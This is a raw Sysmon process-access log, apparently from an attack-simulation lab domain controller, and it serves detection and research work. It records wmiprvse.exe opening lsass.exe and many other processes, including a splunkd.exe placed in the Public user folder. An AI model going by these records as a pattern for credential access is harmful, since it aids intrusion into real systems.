15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 